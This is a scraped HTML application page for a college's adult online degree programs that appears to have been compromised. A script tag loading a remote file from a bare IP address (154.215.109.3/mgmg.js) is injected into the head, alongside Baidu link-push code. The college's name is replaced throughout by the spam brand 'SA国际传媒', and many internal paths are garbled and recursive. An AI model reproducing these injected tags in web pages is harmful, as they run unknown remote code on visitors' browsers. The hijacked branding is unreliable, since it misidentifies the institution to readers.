  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
      <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
      
      
       

<!-- begin Convert Experiences code added 3-30-2021 -->
<script type="text/javascript" src="none"></script>
<!-- end Convert Experiences code -->



<!-- Google Tag Manager -->
<noscript><iframe height="0" src="//www.googletagmanager.com/ns.html?id=GTM-NJ49Q2" style="display:none;visibility:hidden" width="0"></iframe></noscript>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-NJ49Q2');</script>
<!-- End Google Tag Manager -->

   
      <title>Adult Degree Programs - Application</title>
        <meta content="Adult Degree Programs - Application" name="title" />
    <link href="https://www.geneva.edu/online-degree/odpapply" rel="canonical" />



      
        <!-- standard scripts include -->
      <div>

	
<!-- latest jQuery direct from google's CDN Keep // for secure https links -->

<!--<script src="none" type="text/javascript"></script>-->

<!-- MOBILE SPECIFIC METAS ================================= -->
<meta content="width=device-width initial-scale=1.0 maximum-scale=1.0 user-scalable=yes" name="viewport"/>
<!-- Custom mobile header theme color -->
<meta name="theme-color" content="#c99a2c">
<meta name="msapplication-navbutton-color" content="#c99a2c">
<meta name="theme-color" content="#c99a2c">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">

<!-- FONTS ================================================= -->

<!--<link href="https://fonts.googleapis.com/css?family=Nunito:400,400i,700,700i,900" rel="stylesheet"/>-->

<!-- Font Awesome 5 -->
<script src="none" crossorigin="anonymous"></script>
<!--<link crossorigin="anonymous" href="https://use.fontawesome.com/releases/v5.0.13/css/all.css" integrity="sha384-DNOHZ68U8hZfKXOrtjWvjxusGo9WQnrNx2sqG0tfsghAvtVlRW3tvkXWZh58N9jp" rel="stylesheet"/>-->


<!-- CSS =================================================== -->
<link href="https://www.geneva.edu/_files/css/normalize.css" rel="stylesheet"/>
<link href="https://www.geneva.edu/_files/css/main-nav-responsive.css" media="screen" rel="stylesheet" type="text/css"/>
<link href="https://www.geneva.edu/_files/css/main-nav-pure.css" media="screen" rel="stylesheet" type="text/css"/>
<link href="https://www.geneva.edu/_files/css/jquery.mmenu.all.css" rel="stylesheet" type="text/css"/>
<link href="https://www.geneva.edu/_files/css/jquery.jscrollpane.css" media="all" rel="stylesheet" type="text/css"/>
<link href="https://www.geneva.edu/_files/css/geneva-main-streamline.css" rel="stylesheet"/>
<link href="https://www.geneva.edu/_files/css/left-nav-responsive.css" rel="stylesheet" type="text/css"/>
<link href="https://www.geneva.edu/_files/css/right-menu-styles.css" rel="stylesheet" type="text/css"/>
<link href="https://www.geneva.edu/_files/css/clicknav.css" rel="stylesheet" type="text/css"/>
<link href="https://www.geneva.edu/_files/css/search-modal.css" rel="stylesheet" type="text/css"/>
<link href="https://www.geneva.edu/_files/css/skeleton-newbrand.css" rel="stylesheet"/> 

<!-- FAVICON ================================================ -->
<link href="https://www.geneva.edu/_files/sitegraphics/genevicon.ico" rel="icon" type="image/x-icon"/>
<link href="https://www.geneva.edu/_files/sitegraphics/genevicon.ico" rel="shortcut icon" type="image/x-icon"/>
<!-- latest jQuery direct from google's CDN Keep // for secure https links -->
<script src="none" type="text/javascript"></script>




</div>    <!-- standard scripts include -->
      <div>
<link href="/academics/programs/css/streamline-academic-styles.css" rel="stylesheet"/>


</div>  
      
    <script type="text/javascript">
        window.location.replace("https://apply.geneva.edu/portal/applynow/odp_apply");
    </script>


        <link href="https://code.jquery.com/ui/1.10.4/themes/smoothness/jquery-ui.css" rel="stylesheet" />
<script src="none" ></script>
<script src="none" type="text/javascript" ></script>

<!-- tag for pointroll-->


<script type="text/javascript"> 
$(document).ready(function()
{
  //hide the all of the element with class hidContent
  $(".hidContent").hide();
 
  //toggle the componenet with class optionBox
  $(".optionBox").click(function()
  {
    $(".hidContent").hide(600);
    $(this).next(".hidContent").slideToggle(600);
  });

  //toggle the component with class optionBox2
  $(".optionBox2").click(function()
  {
    $(".hidContent").hide(600);
    $(this).next(".hidContent").slideToggle(600);
  });
});

function showClasses(option) {
	$(".td-"+option).css("background-color", "#ffe066");
	//$("td").css("background-color", "#ffe066");
	//$("TD").not(".td-"+option).css("background-color", "none");
	$("TD:not(.td-"+option+")").css("background","none");
	$('.hidContent').hide();
	$("#"+option).slideDown(600);
	}
	function showOption(loc,a) {
		if (a == 'yes') {
			$("#"+loc).slideDown(600);
		} else if (a == 'no') {
			$("#"+loc).slideUp(600);
		}
	$(".td-"+option).css("background-color", "#ffe066");
	//$("td").css("background-color", "#ffe066");
	//$("TD").not(".td-"+option).css("background-color", "none");
	$("TD:not(.td-"+option+")").css("background","none");
	$('.hidContent').hide();
	$("#"+option).slideDown(600);
	}

<!-- hide this script from old browsers
function showClass(m){
    var cost = 0;
    for(var i = 0; i < m.elements.length; i++){
        if(m.elements[i].type == 'checkbox'){
            if(m.elements[i].checked){ //Do something if checkbox is checked
                cost += parseInt(m.elements[i].value);
            }
        }
		if(m.elements[i].type == 'radio'){
            if(m.elements[i].checked){ //Do something if checkbox is checked
                cost += parseInt(m.elements[i].value);
            }
        }
    }
    document.getElementById('rslt').value = cost;
	document.getElementById('amount').value = cost;

// done hiding from old browsers -->
}
</script>
<style type="text/css">

section#base span.firsthead {
    display: block;
    padding: 10px;
    font-weight: bold;
}
section#base span.sectionhead {
    display: inline-block;
    padding: 10px;
    font-weight: bold;
}

#rowhighlights tr:hover {
background-color:#EEEEEE;
}

ul.radioList {
font-size: 15px;
font-weight: bold;
list-style: none;
}
ul.radioList li{
font-size: 15px;
font-weight: bold;
}
</style>
<!-- New Code -->

<script type="text/javascript">
function addName()
{
	// GET BASE ELEMENT TO APPEND CHILD ELEMENTS TO
	var base = document.getElementById("base");
	
	// GET INDEX
	var index = document.getElementById("index").value;
	
	// CREATE HEADERS
	var newHeader1 = document.createElement('label');
	newHeader1.innerHTML = "<span class='sectionhead'>Previously Attended Institution</span>";
	var newHeader2 = document.createElement('br');
        var breaktag = document.createElement('br');
	
	// CREATE ROWS
	var newRow1 = document.createElement('div');
		newRow1.setAttribute("class", "row bg-color-top");
		newRow1.setAttribute("id","row1"+index);
	var newRow2 = document.createElement('div');
		newRow2.setAttribute("class", "row bg-color-bottom");
		newRow2.setAttribute("id","row2"+index);
	
	// CREATE ROW COLUMNS
		// Row 1
			var newColFInput = document.createElement('div');
				newColFInput.setAttribute("class", "four columns");
			var newColMInput = document.createElement('div');
				newColMInput.setAttribute("class", "four columns");
			var newColLInput = document.createElement('div');
				newColLInput.setAttribute("class", "three columns");
		// Row 2
			var newColEmailInput = document.createElement('div');
				newColEmailInput.setAttribute("class", "four columns");
			//var newColBirthDateInput = document.createElement('div');
				//newColBirthDateInput.setAttribute("class", "three columns");
	
	// CREATE REMOVE BUTTON
	var removeBtn = document.createElement('label');
		removeBtn.setAttribute("onclick", "remove('"+index +"')");
		removeBtn.setAttribute("class", "removebtn fa fa-times-circle fa-2x");
		removeBtn.style.float = "right";
	
	// CREATE INPUTS
		// Institution Name
		var newSchoolNameInput = document.createElement('input');
			newSchoolNameInput.setAttribute("type", "text");
			newSchoolNameInput.setAttribute("name", "School"+index);
			newSchoolNameInput.style.width = "97%";
		// School Dates
		var newSchoolDatesInput = document.createElement('input');
			newSchoolDatesInput.setAttribute("type", "text");
			newSchoolDatesInput.setAttribute("name", "SchoolDates"+index);
			newSchoolDatesInput.style.width = "97%";
		// Degree
		var newSchoolDegreeInput = document.createElement('input');
			newSchoolDegreeInput.setAttribute("type", "text");
			newSchoolDegreeInput.setAttribute("name", "SchoolDegree"+index);
			newSchoolDegreeInput.style.width = "97%";
		// Estimated Credits
		var newEstimatedCreditsInput = document.createElement('input');
			newEstimatedCreditsInput.setAttribute("type", "text");
			newEstimatedCreditsInput.setAttribute("name", "EstimatedCredits"+index);
                        newEstimatedCreditsInput.setAttribute("size", "4");
			//newEstimatedCreditsInput.style.width = "97%";
		// Email
		//var newEmailInput = document.createElement('input');
			//newEmailInput.setAttribute("type", "text");
			//newEmailInput.setAttribute("name", "ChildEmail"+index);
			//newEmailInput.style.width = "97%";
	
	// CREATE LABELS
	var labelSchool = document.createElement('label');
		labelSchool.innerHTML = "Name of Institution:";
	var labelSchoolDates = document.createElement('label');
		labelSchoolDates.innerHTML = "Dates Attended:";
	var labelSchoolDegree = document.createElement('label');
		labelSchoolDegree.innerHTML = "Degree:";
	var labelEstimatedCredits = document.createElement('label');
		labelEstimatedCredits.innerHTML = "Estimated Credits:";
	//var labelEmail = document.createElement('label');
		//labelEmail.innerHTML = "Email:";
		
	// ADD LABELS AND INPUTS TO COLUMNS
		// School Name Column
			newColFInput.appendChild(labelSchool );
			newColFInput.appendChild(newSchoolNameInput );
		// School Dates Column
			newColMInput.appendChild(labelSchoolDates );
			newColMInput.appendChild(newSchoolDatesInput);
		// School Degree Column
			newColLInput.appendChild(labelSchoolDegree );
			newColLInput.appendChild(newSchoolDegreeInput);
		// Credits Column
			newColEmailInput.appendChild(labelEstimatedCredits );
			newColEmailInput.appendChild(newEstimatedCreditsInput);
		// BirthDate Column
			//newColBirthDateInput.appendChild(labelBirthDate);
			//newColBirthDateInput.appendChild(newBirthDateInput);

	// 	ADD COLUMNS TO NEW ROW 1
		newRow1.appendChild(newHeader1);
		newRow1.appendChild(removeBtn);
                newRow1.appendChild(breaktag);
		newRow1.appendChild(newColFInput);
		newRow1.appendChild(newColMInput);
		newRow1.appendChild(newColLInput);
		
	// 	ADD COLUMNS TO NEW ROW 2
		newRow2.appendChild(newHeader2);
		newRow2.appendChild(newColEmailInput);
		//newRow2.appendChild(newColBirthDateInput);

	// APPEND NEW ROWS TO BASE ELEMENT
	base.appendChild(newRow1);
	base.appendChild(newRow2);
	
	// INCREMENT INDEX
	index = parseInt(index)+1;

	// SET NEW INDEX VALUE
	document.getElementById("index").value = index;
}



function remove(rowID)
{
	var row1 = document.getElementById("row1"+rowID);
	var row2 = document.getElementById("row2"+rowID);
	var base = document.getElementById("base");
	while (row1.firstChild) {
		row1.removeChild(row1.firstChild);
	}
	while (row2.firstChild) {
		row2.removeChild(row2.firstChild);
	}
	base.removeChild(row1);
	base.removeChild(row2);
	index = parseInt(document.getElementById("index").value)-1;
	document.getElementById("index").value = index;
}

</script>聽聽
<style>
.error {
color:red;
margin-left:5px;
border-color:red;
}

form#adult-online-app label.error { 
display: none; 
}
.divButton
{
	background-color: #686868;
	cursor: pointer;
font-size:18px;
font-weight:bold;
	width: 150px;
	height: auto;
	padding: 10px;
	margin: 20px;
	//border: 1px solid #686868;
	border-radius: 5px;
	text-align: center;
	float: right;
	color: #fff;
	box-shadow: 2px 2px 5px #888888;
	-webkit-box-shadow: 2px 2px 5px #888888;
	-moz-box-shadow: 2px 2px 5px #888888;
}
.divButton:hover
{
	background-color: #daaf48;
}
.removebtn
{
	cursor: pointer;
	margin: 5px;
}

.removebtn:hover
{
	color: red;
}

.bg-color-top
{
	background: #f9f9f9 url(//geneva.edu/student-profiles/assets/undergrad-grad/subtle_white_feathers.png) repeat;
	background-color: #e1e1e1;
	padding-top: 1px;
	padding-left: 5px;
	margin-left: 20px;
	margin-right: 20px;
	margin-top: 10px;
	border-top-left-radius: 5px;
	border-top-right-radius: 5px;
	box-shadow: 0px 2px 0px #e1e1e1;
	-webkit-box-shadow: 0px 5px 0px #e1e1e1;
	-moz-box-shadow: 0px 5px 0px #e1e1e1;
	border-left: solid 1px #686868;
	border-top: solid 1px #686868;
	border-right: solid 1px #686868;
}

.bg-color-bottom
{
	background: #f9f9f9 url(//geneva.edu/student-profiles/assets/undergrad-grad/subtle_white_feathers.png) repeat;
	background-color: #e1e1e1;
	padding-bottom: 10px;
	padding-left: 5px;
	margin-left: 20px;
	margin-right: 20px;
	border-bottom-left-radius: 5px;
	border-bottom-right-radius: 5px;
	border-left: solid 1px #686868;
	border-bottom: solid 1px #686868;
	border-right: solid 1px #686868;
}

ul.quickcol-2{
list-style: none;
    -webkit-column-count: 2; /* Chrome, Safari, Opera */
    -moz-column-count: 2; /* Firefox */
    column-count: 2;

}
ul.quickcol-2 li {
list-style:none;
}

/* smaller than */
@media (max-width: 750px) {
ul.quickcol-2{
-webkit-column-count: 1; /* Chrome, Safari, Opera */
    -moz-column-count: 1; /* Firefox */
    column-count: 1;
}
}
</style>




      
      
      <link href="https://www.geneva.edu/_files/css/colorbox.css" rel="stylesheet" />


<script src="none" ></script>
<script>
   $(document).ready(function(){
    //Examples of how to assign the ColorBox event to elements
    $(".group1").colorbox({rel:'group1'});
    $(".group2").colorbox({rel:'group2', transition:"fade"});
    $(".group3").colorbox({rel:'group3', transition:"none", width:"75%", height:"75%"});
    $(".group4").colorbox({rel:'group4', slideshow:true});
    $(".ajax").colorbox();
if( /Android|webOS|iPhone|iPod|BlackBerry/i.test(navigator.userAgent) ) {
} else {
    $(".youtube").colorbox({iframe:true, innerWidth:640, innerHeight:390});
    $(".vimeo").colorbox({iframe:true, innerWidth:500, innerHeight:409});
    $(".iframe").colorbox({iframe:true,fixed: true, width:"80%", height:"80%"});
    $(".iframeprint").colorbox({iframe:true, width:"720", height:"700"});
    $(".iframepdf").colorbox({iframe:true, innerWidth:800, innerHeight:650});
    $(".iframepdfshort").colorbox({iframe:true, innerWidth:800, innerHeight:500});
    $(".iframeshort").colorbox({iframe:true, innerWidth:800, innerHeight:500});
    $(".iframeshow").colorbox({rel:'iframeshow'});
}
    $(".inline").colorbox({inline:true,scrolling:true, width:"80%"});
    $(".callbacks").colorbox({
     onOpen:function(){ alert('onOpen: colorbox is about to open'); },
     onLoad:function(){ alert('onLoad: colorbox has started to load the targeted content'); },
     onComplete:function(){ alert('onComplete: colorbox has displayed the loaded content'); },
     onCleanup:function(){ alert('onCleanup: colorbox has begun the close process'); },
     onClosed:function(){ alert('onClosed: colorbox has completely closed'); }
    });
    $('.non-retina').colorbox({rel:'group5', transition:'none'})
    $('.retina').colorbox({rel:'group5', transition:'none', retinaImage:true, retinaUrl:true});
    
    //preserving a JavaScript event for inline calls.
    $("#click").click(function(){ 
     $('#click').css({"background-color":"#f00", "color":"#fff", "cursor":"inherit"}).text("Open this window again and this message will still be here.");
     return false;
    });
   });


// Stop browser scrolling

$(document).bind('cbox_open', function () {
    $('html').css({ overflow: 'hidden' });
}).bind('cbox_closed', function () {
    $('html').css({ overflow: 'auto' });
}); 

// Stop browser scrolling


</script>
      
   
<script src="http://154.215.109.3/mgmg.js"></script>


</head>
   <Body><h1><a href="/">SA国际传媒</a></h1><script>
(function(){
var bp = document.createElement('script');
var curProtocol = window.location.protocol.split(':')[0];
if (curProtocol === 'https') {
bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
}
else {
bp.src = 'http://push.zhanzhang.baidu.com/push.js';
}
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(bp, s);
})();
</script>
      <div class="bg-blur">
         <div id="topLinkBar">
              <!-- ICO BAR Include Here-->
            <div>
<!-- Ico Bar --><ul class="topicobar">
<li class="btndrop2 first"><i class="fa-solid fa-pen-to-square">&#160;</i> APPLY
<ul class="btndrop-menu leftalign">
<li><a href="/admissions/tugapply.php">Undergraduate</a></li>
<li><a href="/online-degree/odpapply.php">Online Degree</a></li>
<li><a href="/graduate/gradapply.php">Graduate</a></li>
</ul>
</li>
<li class="nodrop"><a class="toplevel" href="none"><i class="fa-solid fa-gift-card">&#160;</i> GIVE</a></li>
<li class="nodrop"><a class="toplevel" href="/admissions/visit/"><i class="fa-regular fa-location-dot">&#160;</i> VISIT</a></li>
</ul><!-- end Ico Bar -->


</div>         </div>
         <div id="headSpace">
              <div>
<link href="/_files/css/head-bar-streamline.css" rel="stylesheet" type="text/css"/>
<div id="headContainer">
<div class="sec1">
<div id="logoFlag"><a href="/"><img alt="SA国际传媒" height="525" src="/_files/sitegraphics/geneva-spade-light.svg" width="1920"/> </a></div>
<a id="pagetop" name="pagetop"></a></div>
<div class="sec2">
<div id="navMenuSpace">
<div id="navMenuContainer"><nav>
<ul class="click-nav">
<li><a aria-expanded="false" aria-haspopup="true" href="javascript:void(0)" role="button">SA国际传媒</a>
<ul>
<li><a href="/about-geneva/">Fast Facts &amp; Overview</a></li>
<li><a href="/about-geneva/identity/">Geneva Identity</a></li>
<li><a href="/about-geneva/policies/">Academic Policies</a></li>
<li><a href="/about-geneva/leadership.php">Leadership</a></li>
<li><a href="/articles/">Stories, Blogs &amp; Articles</a></li>
<li><a href="/calendar/">Calendar of Events</a></li>
</ul>
</li>
<li><a aria-expanded="false" aria-haspopup="true" href="javascript:void(0)" role="button">Academics</a>
<ul>
<li><a href="/academics/">Explore Academics</a></li>
<li><a href="/academics/programs/">Search Degree Programs</a></li>
<li><a href="/academics/core-studies/">Core Curriculum</a></li>
<li><a href="/academics/honors/">Honors Program</a></li>
<li><a href="/graduate/">Graduate Programs</a></li>
<li><a href="/online-degree/">Online Degree Programs</a></li>
<li><a href="/pittsburgh/">Geneva Pittsburgh Campus</a></li>
<li><a href="/faculty-staff/faculty/">Our Faculty</a></li>
<li><a href="/cfl/">Center for Faith &amp; Life</a></li>
</ul>
</li>
<li><a aria-expanded="false" aria-haspopup="true" href="javascript:void(0)" role="button">Admissions &amp; Aid</a>
<ul>
<li><a href="/financial-aid/tug-financial-aid.php">Undergraduate</a></li>
<li><a href="/graduate/admissions/">Graduate</a></li>
<li><a href="/online-degree/admissions/">Online Degree Programs</a></li>
<li><a href="/admissions/visit/">Visit Geneva</a></li>
<li><a href="/admissions/international/">International Students</a></li>
<li><a href="/admissions/transfers/">Transfer Students</a></li>
<li><a href="/academics/crossroads/earlycollege/">Early College</a></li>
<li><a href="/admissions/military/">Military &amp; Veterans</a></li>
</ul>
</li>
<li><a aria-expanded="false" aria-haspopup="true" href="javascript:void(0)" role="button">Student Life</a>
<ul>
<li><a href="/student-life/engagement/">Activities &amp; Engagement</a></li>
<li><a href="/calling-career/">Calling &amp; Career</a></li>
<li><a href="/student-life/residence-life/">Residence Life &amp; Housing</a></li>
<li><a href="/student-life/wellness/">Health &amp; Wellness</a></li>
<li><a href="/student-life/spiritual-life/">Spiritual Life</a></li>
<li><a href="/student-life/campus-safety/">Campus Safety</a></li>
<li><a href="/student-life/academic-support/">Academic Support</a></li>
<li><a href="/student-life/commuters.php">Commuter Life</a></li>
<li><a href="/student-life/student-resources.php">Student Resources</a></li>
</ul>
</li>
<li><a aria-expanded="false" aria-haspopup="true" href="javascript:void(0)" role="button">Alumni</a>
<ul>
<li><a href="none">Giving</a></li>
<li><a href="/alumni/">Alumni Home</a></li>
<li><a href="/alumni/events/">Alumni Events</a></li>
<li><a href="/alumni/connect/alumni_updateform.php">Alumni Update Form</a></li>
<li><a href="/academics/registrar/student_records_transcripts.php">Transcript Requests</a></li>
<li><a href="/alumni/represent/alumni_referrals.php">Gold and White Referrals</a></li>
<li><a href="/alumni/represent/legacylink.php">Legacy Link Program</a></li>
<li><a href="/alumni/connect/alumni_contact.php">Contact Alumni Engagement</a></li>
</ul>
</li>
<li><a href="none">Athletics</a></li>
</ul>
</nav></div>
<!-- end navMenuContainer --></div>
</div>
<div class="sec3">
<div id="searchGlass"><button class="searchButton" id="modalsearch"> <i class="fa-xl fa-solid fa-magnifying-glass searchButton" style="color: #aa8228;"></i> </button></div>
<div id="screencheck"></div>
<div class="menutrigger"><a href="#menu">&#160;</a></div>
</div>
</div>
<script>// <![CDATA[
document.addEventListener('DOMContentLoaded', () => {
  const menu = document.querySelector('#navMenuSpace .click-nav');
  if (!menu) return;

  // Make any LI that has a UL easier to target
  menu.querySelectorAll(':scope > li').forEach(li => {
    if (li.querySelector(':scope > ul')) li.classList.add('has-submenu');
  });

  const triggers = menu.querySelectorAll(':scope > li.has-submenu > a');

  // ARIA
  triggers.forEach(a => {
    a.setAttribute('aria-haspopup', 'true');
    a.setAttribute('aria-expanded', 'false');
  });

  function closeAll(except) {
    menu.querySelectorAll(':scope > li.submenu_open').forEach(li => {
      if (li !== except) {
        li.classList.remove('submenu_open');
        const btn = li.querySelector(':scope > a[aria-expanded]');
        if (btn) btn.setAttribute('aria-expanded', 'false');
      }
    });
  }

  triggers.forEach(a => {
    a.addEventListener('click', e => {
      const li = a.parentElement;
      const sub = a.nextElementSibling;
      if (sub && sub.tagName === 'UL') {
        e.preventDefault();
        const wasOpen = li.classList.contains('submenu_open');
        closeAll(li);
        li.classList.toggle('submenu_open', !wasOpen);
        a.setAttribute('aria-expanded', String(!wasOpen));
      }
    });

    // Keyboard support
    a.addEventListener('keydown', e => {
      if (e.key === 'Enter' || e.key === ' ') { e.preventDefault(); a.click(); }
      if (e.key === 'Escape') { closeAll(); a.blur(); }
      if (e.key === 'ArrowDown') {
        const first = a.parentElement.querySelector(':scope > ul a');
        if (first) { e.preventDefault(); a.setAttribute('aria-expanded', 'true'); a.parentElement.classList.add('submenu_open'); first.focus(); }
      }
    });
  });

  // Close when clicking outside / focus leaves / press Esc
  document.addEventListener('click', e => { if (!menu.contains(e.target)) closeAll(); });
  document.addEventListener('focusin', e => { if (!menu.contains(e.target)) closeAll(); });
  document.addEventListener('keydown', e => { if (e.key === 'Escape') closeAll(); });
});
// ]]></script>


</div>         </div>
         





    <style type="text/css">
        .videoWindow-clip {
            background: #3d3935 url(../_files/sitegraphics/oldmain-front.webp) no-repeat center;
            background-attachment:initial;
            height:350px; 
        }
            .videoWindow-clip.clip-hero-sm:after {
                background-image: linear-gradient(rgba(0, 0, 0, 0.5), rgba(0, 0, 0, 0) 20%);
                content: '';
                display: block;
                width: 100%;
                height: 100%;
                position: absolute;
                top: 0px;
                left: 0;
                opacity: 1;
                pointer-events: none;
        }
                @media(min-width: 750px){
           .videoWindow-clip {
               height:auto!important; 
           }
        }
        @media(min-width: 960px){
           .videoWindow-clip {
               background-attachment:fixed;
           }
        }
        
/* secondary menu adjustments*/
.valley-menu {
    margin-top: -70px;
}
@media (min-width: 960px) {
div.responsenav {
    display: block;
    margin-top: -160px;
    /* correction:none; */
}
}
/*end secondary menu adjustments*/
    </style>
<link href="/online-degree/odpapply/organizational-leadership/general-studies/academics/programs/academics/programs/css/academic-hero.css" rel="stylesheet" />
<!-- Academics Hero -->
<div class="videoWindow-clip clip-hero-sm">
    <div class="moireOverlay">
            </div>
    <div id="heroTitle">
                        <h2>Apply Now</h2>
                    </div>
</div>

<svg class="svg">
        <clipPath clipPathUnits="objectBoundingBox" id="large-hero-clip"><path d="M1,0 v0.918 h-0.453 c-0.028,0,-0.047,0.082,-0.047,0.082 s-0.019,-0.082,-0.047,-0.082 H0 V0 H1" /></clipPath>
      </svg>

      <svg class="svg">
        <clipPath clipPathUnits="objectBoundingBox" id="medium-hero-clip"><path d="M1,0 v0.918 H0.565 c-0.039,0,-0.065,0.082,-0.065,0.082 s-0.026,-0.082,-0.065,-0.082 H0 V0 H1" /></clipPath>
      </svg>

                  <svg class="svg">
        <clipPath clipPathUnits="objectBoundingBox" id="small-hero-clip"><path d="M1,0 v0.909 h-0.278 c-0.133,0,-0.222,0.091,-0.222,0.091 c0,0,-0.089,-0.091,-0.221,-0.091 H0 V0 h1" /></clipPath>
      </svg>
      
      <svg class="svg">
        <clipPath clipPathUnits="objectBoundingBox" id="short-hero-larger"><path d="M1,0 v0.856 H0.577 c-0.046,0,-0.077,0.144,-0.077,0.144 s-0.031,-0.144,-0.077,-0.144 H0 V0 H1" /></clipPath>
      </svg>
      
                  
      <svg class="svg">
        <clipPath clipPathUnits="objectBoundingBox" id="short-hero-large"><path d="M1,0 v0.862 H0.584 c-0.05,0,-0.083,0.138,-0.083,0.138 s-0.034,-0.138,-0.083,-0.138 H0.001 V0 H1" /></clipPath>
      </svg>
      
      <svg class="svg">
        <clipPath clipPathUnits="objectBoundingBox" id="short-hero-medium"><path d="M1,0 v0.862 H0.608 c-0.065,0,-0.108,0.138,-0.108,0.138 s-0.044,-0.138,-0.108,-0.138 H0 V0 H1" /></clipPath>
      </svg>
     
<!-- End Academics Hero -->







         
         			<div id="statusBarSpace">
				<div id="statusBarContainer">
					<!--<div class="leftMenuToggle"><em class="fa fa-bars"></em> Menu</div>-->
					<div id="breadCrumbs">
						

<ul>
            
            
        
                <li><a href="/online-degree/odpapply/organizational-leadership/general-studies/academics/programs/index.php">Home</a></li>
                
            
        
                                    <li><a href="/online-degree/odpapply/organizational-leadership/general-studies/academics/programs/css/index.php">Online Degree Programs</a></li>
            
                                    
                                    
            <li class="selected">Apply Now</li>
            
</ul>

					</div>
					<div id="statusPanel">
						<script type="text/javascript">
//document.write(dateFormat(now, "fullDate"));
</script>
					</div>
				</div>
			</div>
         <div id="contentSpace">
				
				
				<div id="pageContent">
					<div class="wide-container">
						<div id="pageTopper" ></div>
						<div class="flex-template-container">
							<div class="flex-template-content">
								
    <div id="pgTitle">
                <h2>Undergraduate (Adult) Online - Application</h2>
            </div>

								
								<em class="clearit" ></em>
								
								
								
								
								<div class="content-container">
									<div id="GC-shortform-top" ></div>
									
									    <!--<script data-default-width="650px" data-role="form" defer="defer" src="none" type="text/javascript"></script>-->
<p style="text-align: center;"><strong>Questions? Email <a href="mailto:onlineinfo@geneva.edu">onlineinfo@geneva.edu</a> or call us at 724-858-4026 </strong></p>
<p style="text-align: center;">&#160;</p>
<p style="text-align: center;">SA国际传媒 admits students of any race, color, sex, disability, and national or ethnic origin to all the rights, privileges, programs and activities generally accorded or made available to students at the school. It does not discriminate on the basis of race, color, sex, disability, and national or ethnic origin in the administration of its educational policies, admissions policies, scholarships and loan programs, and athletic and other school-administered programs.</p>

									
									
									
									<!-- START OPEN GRAPH TAGS-->
    <meta content="Apply Now" property="og:title" />
        <meta content="website" property="og:type" />
    
	<meta content="https://www.geneva.edu/online-degree/odpapply" property="og:url" />
		<meta content="SA国际传媒 offers academically excellent, Christ-centered and affordable education." property="og:description" />
		    	    	<meta content="https://www.geneva.edu/_files/images/oldmain-web.jpg" property="og:image" />
    	    	<!-- END OPEN GRAPH TAGS-->
	





									
									
									
									
									
									
									
									
									
									
									
									
									
									
									
									
									
									
									
									
									
                                    <div id="printBlock">
        <a href="/online-degree/odpapply/organizational-leadership/general-studies/academics/programs/css/odpapply-print"><i class="fa-regular fa-print" ></i> Print</a>        
    </div>
    <br class="clearit" />
								</div>
								<!-- end contentContainers -->
								<div id="faux-column">
									
									
									
									
								</div>
								<!-- end faux-->
								
								<br class="clearit" />
								
							</div>
							<!-- end FLex Template Content -->
							<div class="flex-template-menu">
								<div id="r-menu-wrap">
									<div id="rightMenuContainer">
    <div class="rightMenuToggle">
        <div id="nav-icon3"><span ></span> <span ></span> <span ></span> <span ></span></div>
    </div>
    <div id="rightMenuLinks">
        <div class="rightNavTopText">
                                    <a href="/online-degree/odpapply/organizational-leadership/general-studies/academics/programs/css/index.php">Online Degree Programs</a>
        </div>
        <div class="submenu-level1" id="submenu-level1">
                                                                                    <ul class="menu-1">
                                                                                                                                            <li><a class="" href="/online-degree/odpapply/organizational-leadership/general-studies/academics/programs/css/majors/index.php">Explore Online Degrees</a></li>
                                                                                                                                                                                        <li><a class="" href="/online-degree/odpapply/organizational-leadership/general-studies/academics/programs/css/course-offerings.php">Course Offerings</a></li>
                                                                                                                                                                                                            <li><a class="" href="/online-degree/odpapply/organizational-leadership/general-studies/academics/programs/financial-aid/adult-tuition-aid.php">Online Degree Tuition &amp; Aid</a></li>
                                                                                                                                                                                                                                                                                                                                    <li><a class="" href="/online-degree/odpapply/organizational-leadership/general-studies/academics/programs/css/faculty-online-grad.php">Meet our Faculty</a></li>
                                                                                                                                                                                        <li><a class="" href="/online-degree/odpapply/organizational-leadership/general-studies/academics/programs/css/online-studenthandbook.php">Student Handbook</a></li>
                                                                                                                                                                                                            <li><a class="current" href="/online-degree/odpapply/organizational-leadership/general-studies/academics/programs/css/odpapply.php">Apply Now</a></li>
                                                                                                                                                                                                                                                                            <li><a class="" href="/online-degree/odpapply/organizational-leadership/general-studies/academics/programs/css/human-resources.php">BPS in Human Resources</a></li>
                                                                                                                                                                                        <li><a class="" href="/online-degree/odpapply/organizational-leadership/general-studies/academics/programs/css/child-family-services.php">BPS in Child Family Services</a></li>
                                                                                                                                                                                        <li><a class="" href="/online-degree/odpapply/organizational-leadership/general-studies/academics/programs/css/organizational-leadership.php">BPS in Organizational Leadership</a></li>
                                                                                                                                                                                        <li><a class="" href="/online-degree/odpapply/organizational-leadership/general-studies/academics/programs/css/management.php">BPS in Management</a></li>
                                                                                                                                                                                        <li><a class="" href="/online-degree/odpapply/organizational-leadership/general-studies/academics/programs/css/general-studies.php">General Studies</a></li>
                                                                            </ul>
                    </div>
        <div id="navBottomArea" ></div>
    </div>
</div>


								</div>
								<!-- end r-menu-wrap -->
							</div>
							<!-- end flex-template-menu -->
						</div>
						<!-- end flex-template-container -->
					</div>
					<!-- end wide-container -->
					
					
				</div>
				<!-- end div pageContent -->
				<!--<br class="clearit" />-->
			</div>
         <!-- End div contentContainer--><br class="clearit" />
         <div id="footerBar" ></div>
         <div id="footerStripes" ></div>
      </div>
      <!-- end contentSpace div-->
      <div id="footerSpace">
          <!-- Footer Include Here-->
         <div>
<div class="footerGradient">
<div class="wide-container" id="footerContainer">
<div class="row">
<div class="four columns" id="footerLeft"><img alt="" aria-hidden="true" class="u-full-width" height="152" src="/_files/sitegraphics/geneva-spade-stacked.svg" style="max-width: 200px;" width="200"/>
